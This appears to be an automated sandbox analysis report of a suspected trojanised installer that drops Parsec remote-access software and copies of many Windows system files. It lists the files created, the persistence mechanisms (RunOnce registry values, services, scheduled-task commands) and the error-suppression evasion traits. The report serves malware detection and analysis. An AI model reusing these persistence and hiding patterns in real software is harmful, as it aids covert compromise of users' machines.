Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-PJ6TS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-2DG57.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-B9257.tmp
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec\vdd\parsec-vdd.exe
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-CEP95.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-2OR81.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-KU451.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-CFLCO.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-JBM9N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-GTN75.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec\teams.exe
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-BT11A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-3KUTO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-IQ3DU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dll
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | File created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-HI204.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-ADU4M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-0HD4S.tmp
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-NSRV7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-V0EDB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-O1M5L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-G3B26.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-S2KJ6.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-KU5LP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)Jump to dropped file
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-3JPOJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-VK3B0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-M8LS1.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-R541B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-514OT.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-66C2H.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-OGENO.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\parsecd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-IH0UT.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmpJump to dropped file

Boot Survival

Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\System32\drvinst.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\parsecvusba
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnk
Source: C:\Program Files\Parsec\pservice.exe Code function: 39_2_00007FF7CD032AC0 StartServiceCtrlDispatcherW,39_2_00007FF7CD032AC0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\drvinst.exe File opened: NULL
Source: C:\Windows\System32\drvinst.exe File opened: NULL
Source: C:\Windows\System32\drvinst.exe File opened: NULL
Source: C:\Windows\System32\drvinst.exe File opened: NULL
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\pservice.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\pservice.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process information set: NOOPENFILEERRORBOX
